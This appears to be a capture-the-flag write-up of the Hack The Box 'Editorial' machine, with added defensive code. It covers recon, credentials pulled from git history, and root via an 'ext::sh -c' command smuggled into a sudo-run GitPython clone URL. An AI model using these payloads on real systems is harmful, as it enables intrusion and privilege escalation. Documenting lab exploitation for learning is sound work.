Editorial | Hack the box

First we ping the machine to see whether it responds.

ping -c 1 10.10.11.20
PING 10.10.11.20 (10.10.11.20) 56(84) bytes of data.
64 bytes from 10.10.11.20: icmp_seq=1 ttl=63 time=158 ms

--- 10.10.11.20 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 157.795/157.795/157.795/0.000 ms

We run the first nmap command to discover listening ports.

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.20 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:20 CET
Initiating SYN Stealth Scan at 20:20
Scanning 10.10.11.20 [65535 ports]
Discovered open port 22/tcp on 10.10.11.20
Discovered open port 80/tcp on 10.10.11.20
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 11.31% done; ETC: 20:20 (0:00:16 remaining)
cat allPorts 
# Nmap 7.93 scan initiated Mon Oct 28 20:20:18 2024 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn -oG allPorts 10.10.11.20
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.11.20 ()    Status: Up
Host: 10.10.11.20 ()    Ports: 22/open/tcp//ssh///, 80/open/tcp//http///    Ignored State: closed (65533)
# Nmap done at Mon Oct 28 20:20:38 2024 -- 1 IP address (1 host up) scanned in 19.42 seconds

We only have ports 22 and 80, so we run the second nmap command to find the service versions.

nmap -sCV -p22,80 10.10.11.20 -oN targeted
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:21 CET
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_  256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
cat targeted 
# Nmap 7.93 scan initiated Mon Oct 28 20:21:58 2024 as: nmap -sCV -p22,80 -oN targeted 10.10.11.20
Nmap scan report for 10.10.11.20
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0dedb29ce253fbd4c8c1196e7580d864 (ECDSA)
|_  256 0fb9a7510e00d57b5b7c5fbf2bed53a0 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editorial.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Okay, the first thing we will do is use whatweb to see whether there is any vulnerability.

whatweb 10.10.11.20
http://10.10.11.20 [301 Moved Permanently] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.20], RedirectLocation[http://editorial.htb], Title[301 Moved Permanently], nginx[1.18.0]
ERROR Opening: http://editorial.htb - no address for editorial.htb

Indeed, we see it reports no address; when we try to access it from the browser we see nothing. We try enumerating with a script.

nmap --script http-enum -p80 10.10.11.20 -oN webScan
Starting Nmap 7.93 ( https://nmap.org ) at 2024-10-28 20:24 CET
Nmap scan report for 10.10.11.20
Host is up (0.17s latency).

PORT   STATE SERVICE
80/tcp open  http

It tells us port 80 is open, so we start listening by setting up a server in Python.

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

We look for SUID permissions.

find / -perm -4000 -user root 2>/dev/null
/opt/vivaldi/vivaldi-sandbox
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/ntfs-3g
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/bin/vmware-user-suid-wrapper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/xorg/Xorg.wrap
/usr/libexec/polkit-agent-helper-1
/usr/sbin/exim4
/usr/sbin/pppd
/usr/share/codium/chrome-sandbox

I see many paths, but nothing I can leverage to escalate privileges.

I try connecting over SSH; I see that I can, but I don't have the passwords.

ssh editorial@10.10.11.20
The authenticity of host '10.10.11.20 (10.10.11.20)' can't be established.
ECDSA key fingerprint is SHA256:vD0RRLKSdq+ahh96RLgD4c6th30+PC391OHKI6SWlhY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.20' (ECDSA) to the list of known hosts.
editorial@10.10.11.20's password: 
Connection closed by 10.10.11.20 port 22

I go back to the web and try fuzzing to see existing paths. I find an interesting directory, go in, and have found the password for the dev user.

ssh dev@10.10.11.20
dev@10.10.11.20's password: 
Permission denied, please try again.
dev@10.10.11.20's password: 
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Mon Oct 28 08:26:33 PM UTC 2024

  System load:  0.0               Processes:             245
  Usage of /:   61.9% of 6.35GB   Users logged in:       2
  Memory usage: 14%               IPv4 address for eth0: 10.10.11.20
  Swap usage:   0%

I see the user flag.

cat user.txt

I try going to the root directory, but I don't have permission to enter it. I look for SUID permissions with find.

dev@editorial:/$ find / -perm -4000 -user root 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/umount
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/su
/tmp/0xdf

I see the passwd directory, try to enter it but I don't have permission, and I see the following error.

dev@editorial:/usr/bin$ cat passwd 
�[����2[�D Qf9���d�7�Fvm�@k�b0j��N^�}��AGW �������x, ��*��9�eq��gF"_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable__cxa_finalize__libc_start_mainstderrdcgettext__fprintf_chkfputsfputcexitstdoutgetspnamgmtimestrftime__printf_chk__stack_chk_failfreestrcmp__errno_locationsetlocalestrdup__syslog_chk

With the getcap command I look for more capabilities.

dev@editorial:/usr/bin$ getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep

Well, fine, I don't see how to take advantage of that right now. I keep looking with an ls and see another directory.

dev@editorial:~$ ls
apps  user.txt
dev@editorial:~$ cd apps/

Through an internet search I see that from the apps directory I have to use git to get into the different environments.

dev@editorial:~/apps$ git log --oneline
8ad0f31 (HEAD -> master) fix: bugfix in api port endpoint
dfef9f2 change: remove debug and update api port
b73481b change(api): downgrading prod to dev
1e84a03 feat: create api to editorial info
3251ec9 feat: create editorial app

I try them one by one because I don't know what each of them will contain.

dev@editorial:~/apps$ git log -p 3251ec9
commit 3251ec9e8ffdd9b938e83e3b9fbf5fd1efa9bbb8
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:48:43 2023 -0500

    feat: create editorial app

    * This contains the base of this project.
    * Also we add a feature to enable to external authors send us their
       books and validate a future post in our editorial.

diff --git a/app_editorial/app.py b/app_editorial/app.py
new file mode 100644

I don't see anything there, so I will try another one.

commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae
Author: dev-carlos.valderrama <dev-carlos.valderrama@tiempoarriba.htb>
Date:   Sun Apr 30 20:55:08 2023 -0500

    change(api): downgrading prod to dev

    * To use development environment.

diff --git a/app_api/app.py b/app_api/app.py
index 61b786f..3373b14 100644
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
 @app.route(api_route + '/authors/message', methods=['GET'])
 def api_mail_new_authors():
     return jsonify({
-        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: prod\nPassword: 080217_Producti0n_2023!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
+        'template_mail_message': "Welcome to the team! We are thrilled to have you on board and can't wait to see the incredible content you'll bring to the table.\n\nYour login credentials for our internal forum and authors site are:\nUsername: dev\nPassword: dev080217_devAPI!@\nPlease be sure to change your password as soon as possible for security purposes.\n\nDon't hesitate to reach out if you have any questions or ideas - we're always here to support you.\n\nBest regards, " + api_editorial_name + " Team."
     }) # TODO: replace dev credentials when checks pass

 # -------------------------------
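Review bot: the `template_mail_message` value at lines 64-66 of app_api/app.py embeds a live username and password in source, and this hunk only swaps the prod credential for a dev one instead of removing it, so the prod value stays in the repository history and must be treated as exposed and rotated along with the dev one. Read the credential from the environment or a secret store at request time (a variable such as `AUTHOR_ONBOARDING_PASSWORD` is a suggested name), or better, drop the password from the message entirely and hand new authors a one-time reset link. The trailing `# TODO: replace dev credentials when checks pass` shows the swap was meant to be temporary, which is exactly how such values end up shipped; a pre-commit secret scan would have blocked both versions.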

Now I can see the system usernames and their corresponding passwords.
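The credentials above were recoverable because a secret was committed and later replaced rather than removed, so both values live in the history. As an added example (not part of this write-up), a small scanner over `git log -p` output that reports every added or removed diff line that looks like a credential, with the commit and file it belongs to; the sample log and its placeholder passwords are constructed:

```python
"""Added example (not from the write-up): audit `git log -p` output for
credential-looking lines, like the ones found in app_api/app.py above."""
import re
from typing import List, Tuple

# Constructed patterns: a value following password / secret / token / api key.
CREDENTIAL_PATTERNS = [
    re.compile(r"(?i)password\s*[:=]\s*\S+"),
    re.compile(r"(?i)(api[_-]?key|secret|token)\s*[:=]\s*\S+"),
]
Finding = Tuple[str, str, str]  # (short commit id, file path, diff line)


def scan_git_log(log_text: str) -> List[Finding]:
    """Return (commit, file, line) for every +/- diff line that matches."""
    findings: List[Finding] = []
    commit = path = ""
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:7]
        elif line.startswith("diff --git "):
            path = line.split(" b/", 1)[-1]  # "diff --git a/x b/x" -> "x"
        elif line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            # Removed lines count too: a secret swapped out is still in history.
            if any(p.search(line) for p in CREDENTIAL_PATTERNS):
                findings.append((commit, path, line))
    return findings


# Constructed sample shaped like the commit shown above; placeholder secrets.
SAMPLE_LOG = """\
commit b73481bb823d2dfb49c44f4c1e6a7e11912ed8ae

    change(api): downgrading prod to dev

diff --git a/app_api/app.py b/app_api/app.py
--- a/app_api/app.py
+++ b/app_api/app.py
@@ -64,7 +64,7 @@ def index():
-        'msg': "Username: prod\\nPassword: <PROD_PASSWORD_PLACEHOLDER>"
+        'msg': "Username: dev\\nPassword: <DEV_PASSWORD_PLACEHOLDER>"
     }) # TODO: replace dev credentials when checks pass
"""

if __name__ == "__main__":
    # Real use: feed the output of `git log -p` in place of the sample.
    for commit, path, line in scan_git_log(SAMPLE_LOG):
        print(f"{commit} {path}: {line.strip()}")
```

Running `git log -p` inside ~/apps and passing that text to `scan_git_log` would flag both the removed prod line and the added dev line of commit b73481b.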

I become the prod user.

dev@editorial:~/apps$ su prod
Password:

I check what permissions I have.

prod@editorial:~$ sudo -l
[sudo] password for prod: 
Matching Defaults entries for prod on editorial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User prod may run the following commands on editorial:
    (root) /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py *

I see that this message tells me I have root execution permission on the indicated directory.

I cat it and read the contents.

prod@editorial:~$ cat /opt/internal_apps/clone_changes/clone_prod_change.py
#!/usr/bin/python3

import os
import sys
from git import Repo

os.chdir('/opt/internal_apps/clone_changes')

url_to_clone = sys.argv[1]

r = Repo.init('', bare=True)
r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])

I run it.

prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext:: sh -c touch% /tmp/pwned'
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext:: sh -c touch% /tmp/pwned new_changes
  stderr: 'Cloning into 'new_changes'...
error: cannot run : No such file or directory
fatal: Can't run specified command
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

It seems to throw an error, but when I list the directory I am in again, I see a new file, pwned.

prod@editorial:/tmp$ ls -l
total 156
-rwsrwsrwx 1 root root 125688 Oct 28 19:13 0xdf
-rw-r--r-- 1 root root      0 Oct 28 21:00 pwned
-rw-r--r-- 1 root root     33 Oct 28 16:32 root
-rw-rw-r-- 1 prod prod     42 Oct 28 15:06 shell.sh
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-ModemManager.service-UhnVKh
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-logind.service-3ntdas
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-resolved.service-ET5KMa
drwx------ 3 root root   4096 Oct 28 10:01 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-systemd-timesyncd.service-WEXcRM
drwx------ 3 root root   4096 Oct 28 16:28 systemd-private-e9b95616f16a47fd8430e9e4c7db1bbf-upower.service-hICjtH
drwx------ 2 root root   4096 Oct 28 10:02 vmware-root_795-4257200573
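The run above shows why the sudo rule is dangerous: the script clones whatever URL it is given with `protocol.ext.allow=always`, so an `ext::` URL becomes a command executed as root. As an added example, not the box's own script, here is a hardened stand-in that validates the URL and never relaxes the transport policy; the allow-listed hosts are assumptions:

```python
"""Added example, not the box's clone_prod_change.py: same job (clone a
repository into /opt/internal_apps/clone_changes) but the user-supplied URL
is checked first and the ext transport is pinned off instead of enabled."""
import os
import sys
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"https", "ssh"}
ALLOWED_HOSTS = {"editorial.htb", "git.editorial.htb"}   # assumed hosts
CLONE_DIR = "/opt/internal_apps/clone_changes"


def is_safe_clone_url(url: str) -> bool:
    """Accept only https/ssh URLs to allow-listed hosts; reject everything
    else, including ext::, file://, scp-style and option-looking arguments."""
    if not url or url.startswith("-") or any(c.isspace() for c in url):
        return False
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False          # covers "ext::...", "file://", bare paths
    return parts.hostname in ALLOWED_HOSTS


def clone(url: str, dest: str = "new_changes") -> None:
    """Clone with GitPython without ever enabling protocol.ext.allow."""
    if not is_safe_clone_url(url):
        raise SystemExit(f"refusing to clone untrusted URL: {url!r}")
    from git import Repo   # imported lazily so the validator runs without GitPython
    os.chdir(CLONE_DIR)
    # Pin the transport policy explicitly instead of relaxing it.
    Repo.clone_from(url, dest, multi_options=["-c protocol.ext.allow=never"])


if __name__ == "__main__":
    if len(sys.argv) != 2:
        raise SystemExit(f"usage: {sys.argv[0]} <repository-url>")
    clone(sys.argv[1])
```

Even with this check in place, a sudo rule ending in `*` still lets the caller pass arbitrary arguments, so the rule itself should be narrowed to a fixed command line.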

I write a bash script and give myself shell execution permissions.

prod@editorial:/tmp$ nano privesc

I give it execute permission.

prod@editorial:/tmp$ chmod 775 privesc

I run it again.

prod@editorial:/tmp$ sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c /tmp/privesc.sh'
Traceback (most recent call last):
  File "/opt/internal_apps/clone_changes/clone_prod_change.py", line 12, in <module>
    r.clone_from(url_to_clone, 'new_changes', multi_options=["-c protocol.ext.allow=always"])
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1275, in clone_from
    return cls._clone(git, url, to_path, GitCmdObjectDB, progress, multi_options, **kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/repo/base.py", line 1194, in _clone
    finalize_process(proc, stderr=stderr)
  File "/usr/local/lib/python3.10/dist-packages/git/util.py", line 419, in finalize_process
    proc.wait(**kwargs)
  File "/usr/local/lib/python3.10/dist-packages/git/cmd.py", line 559, in wait
    raise GitCommandError(remove_password_if_present(self.args), status, errstr)
git.exc.GitCommandError: Cmd('git') failed due to: exit code(128)
  cmdline: git clone -v -c protocol.ext.allow=always ext::sh -c /tmp/privesc.sh new_changes
  stderr: 'Cloning into 'new_changes'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

I list the current directory.

prod@editorial:/tmp$ sudo ./privesc.sh 
Sorry, user prod is not allowed to execute './privesc.sh' as root on editorial.
prod@editorial:/tmp$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14  2024 /bin/bash
prod@editorial:/tmp$ bash -p 
bash-5.1# whoami
root
bash-5.1# cd /root
bash-5.1# ls
root.txt

Now I am root.